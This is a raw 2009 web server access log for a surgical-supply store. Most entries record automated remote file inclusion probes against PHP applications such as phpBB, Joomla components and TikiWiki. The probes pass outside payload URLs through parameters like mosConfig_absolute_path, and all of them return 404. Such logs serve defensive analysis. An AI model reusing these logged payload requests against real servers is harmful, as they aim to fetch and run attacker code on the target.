121.254.64.69 - - [12/May/2009:00:40:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Foxy/1; Foxy/1)"
72.55.164.230 - - [12/May/2009:00:40:26 -0400] "GET /logs/access_log.Q109012500//include.php?path[docroot]=http://212.227.74.68/catalog/safe1.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.820"
190.144.44.36 - - [12/May/2009:00:40:48 -0400] "GET /logs/access_log.Q109010100%20%20/components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:40:48 -0400] "GET /components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:40:48 -0400] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:42:06 -0400] "GET /logs/access_log.Q108102500%20%20/components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:00:42:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
190.144.44.36 - - [12/May/2009:00:43:26 -0400] "GET /logs/access_log.Q109010100//include/admin.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:43:26 -0400] "GET /logs/access_log.Q109042600//include/admin.lib.inc.php?site_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:00:43:27 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:00:43:27 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:00:43:27 -0400] "GET /logs/access_log.Q108112900//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:00:44:37 -0400] "GET /logs/access_log.Q108112900%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:44:38 -0400] "GET /logs//arcade.php?phpbb_root_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:44:38 -0400] "GET /logs/access_log.Q108061400//arcade.php?phpbb_root_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:44:38 -0400] "GET //arcade.php?phpbb_root_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
85.214.72.235 - - [12/May/2009:00:44:41 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.214.72.235 - - [12/May/2009:00:44:41 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
85.214.72.235 - - [12/May/2009:00:44:41 -0400] "GET /logs/access_log.Q108112900//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.59.11.66 - - [12/May/2009:00:44:51 -0400] "GET /logs/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
212.59.11.66 - - [12/May/2009:00:44:51 -0400] "GET /sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
212.59.11.66 - - [12/May/2009:00:44:51 -0400] "GET /logs/access_log.Q108122500/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
212.59.11.66 - - [12/May/2009:00:44:57 -0400] "GET /logs/access_log.Q108090400/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:00:45:00 -0400] "GET /logs/access_log.Q108122800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
77.221.130.6 - - [12/May/2009:00:45:19 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.221.130.6 - - [12/May/2009:00:45:19 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
77.221.130.6 - - [12/May/2009:00:45:19 -0400] "GET /logs/access_log.Q108112900//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
199.120.90.222 - - [12/May/2009:00:45:29 -0400] "GET /logs/access_log.Q108100100//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:29 -0400] "GET //appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:30 -0400] "GET /logs//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:40 -0400] "GET /logs/access_log.Q108111600//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:45 -0400] "GET /logs/access_log.Q108100100//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:45 -0400] "GET //appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:45 -0400] "GET /logs//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:46 -0400] "GET /logs/access_log.Q108100100//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:46 -0400] "GET //appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:46 -0400] "GET /logs//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:49 -0400] "GET /logs/access_log.Q108111600//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:50 -0400] "GET /logs/access_log.Q108111600//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:51 -0400] "GET /logs/access_log.Q108100100//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:51 -0400] "GET //appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.65"
77.221.130.6 - - [12/May/2009:00:45:51 -0400] "GET /logs/access_log.Q108122100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
199.120.90.222 - - [12/May/2009:00:45:51 -0400] "GET /logs//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 220 "-" "libwww-perl/5.65"
199.120.90.222 - - [12/May/2009:00:45:53 -0400] "GET /logs/access_log.Q108111600//appserv/main.php?appserv_root=http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.65"
85.214.72.235 - - [12/May/2009:00:46:52 -0400] "GET /logs/access_log.Q108122800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:00:46:53 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:00:46:53 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:00:46:57 -0400] "GET /logs/access_log.Q108112900//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
212.59.11.66 - - [12/May/2009:00:47:05 -0400] "GET /logs/access_log.Q108122500%20%20/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
212.59.11.66 - - [12/May/2009:00:47:09 -0400] "GET /logs/access_log.Q108090400%20%20/sohoadmin/program/webmaster/product_update.php?_SESSION[docroot_path]=http://212.227.74.68/catalog/fx29id.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:00:47:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.32.210.206 - - [12/May/2009:00:47:33 -0400] "GET //arcade.php?phpbb_root_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:47:33 -0400] "GET /logs//arcade.php?phpbb_root_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:47:33 -0400] "GET /logs/access_log.Q109030500%20%20//arcade.php?phpbb_root_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:48:14 -0400] "GET /logs//index_inc.php?DOCUMENT_ROOT=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:48:14 -0400] "GET /logs/access_log.Q109021400//index_inc.php?DOCUMENT_ROOT=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:48:14 -0400] "GET //index_inc.php?DOCUMENT_ROOT=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:48:29 -0400] "GET /logs/access_log.Q108060100%20%20//arcade.php?phpbb_root_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:48:49 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:48:49 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:48:57 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:48:57 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:48:58 -0400] "GET /logs/access_log.Q109010100/components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:49:04 -0400] "GET /logs/access_log.Q108061400%20%20//arcade.php?phpbb_root_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
190.144.44.36 - - [12/May/2009:00:49:24 -0400] "GET /logs/access_log.Q108102500/components/com_forum/download.php?phpbb_root_path=http://www.freewebtown.com/xisum2009/fx29id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:49:25 -0400] "GET //index_inc.php?DOCUMENT_ROOT=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:49:25 -0400] "GET /logs//index_inc.php?DOCUMENT_ROOT=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
218.150.79.146 - - [12/May/2009:00:49:25 -0400] "GET /logs/access_log.Q109021400//index_inc.php?DOCUMENT_ROOT=http://www.powerledshop.com/tst//data/fx1?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:00:49:32 -0400] "GET /logs/access_log.Q108112900%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
85.214.94.23 - - [12/May/2009:00:49:33 -0400] "GET /tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
85.214.94.23 - - [12/May/2009:00:49:33 -0400] "GET /logs/access_log.Q108090400/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.214.94.23 - - [12/May/2009:00:49:34 -0400] "GET /logs/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://www.musil.cz/obchod//components/com_virtuemart/js/mootools/id3.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.103.144 - - [12/May/2009:00:49:57 -0400] "GET /logs/access_log.Q108122100//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:49:59 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:49:59 -0400] "GET /logs/error_log.Q108071100/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:49:59 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:50:01 -0400] "GET /logs/error_log.Q108111700/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
121.165.73.157 - - [12/May/2009:00:50:07 -0400] "GET /logs/access_log.Q108072700/index.php?p=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:00:50:07 -0400] "GET /index.php?p=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:00:50:07 -0400] "GET /logs/index.php?p=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
121.165.73.157 - - [12/May/2009:00:50:07 -0400] "GET /logs/access_log.Q108102400/index.php?p=http://www.giskaluga.ru/local.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
193.221.119.126 - - [12/May/2009:00:50:24 -0400] "GET /logs/error_log.Q108071100%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
193.221.119.126 - - [12/May/2009:00:50:25 -0400] "GET /logs/error_log.Q108111700%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
221.139.1.251 - - [12/May/2009:00:51:07 -0400] "GET /logs/access_log.Q108122800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:00:51:14 -0400] "GET /mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:00:51:14 -0400] "GET /logs/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:00:51:14 -0400] "GET /logs/error_log.Q108071100/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:00:51:14 -0400] "GET /logs/error_log.Q108111700/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:00:51:21 -0400] "GET /logs/error_log.Q108111700%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
222.239.76.25 - - [12/May/2009:00:51:29 -0400] "GET /logs/error_log.Q108071100%20%20/mods/business_functions.php?GALLERY_BASEDIR=http://isportion.co.kr/kboard/lang/fatal1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.32.210.206 - - [12/May/2009:00:51:35 -0400] "GET /logs/access_log.Q108070100//arcade.php?phpbb_root_path=http://www.ladyboss.com.ua/images/fx29id2.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:00:52:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.72.114 - - [12/May/2009:00:53:43 -0400] "GET /images/items/store_blades_section_over.jpg HTTP/1.1" 200 8357 "-" "Googlebot-Image/1.0"
221.139.1.251 - - [12/May/2009:00:56:36 -0400] "GET /logs/access_log.Q108122800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [12/May/2009:00:57:21 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.21.134.11 - - [12/May/2009:00:58:10 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L00546E427870C9000F2C05I+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:40 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45921 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:44 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:44 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:44 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:45 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:45 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:45 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:46 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:46 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:46 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:46 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:47 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:47 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:47 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:47 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:48 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:48 -0400] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 200 2069 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:49 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:49 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:49 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
202.21.134.11 - - [12/May/2009:00:58:49 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; )"
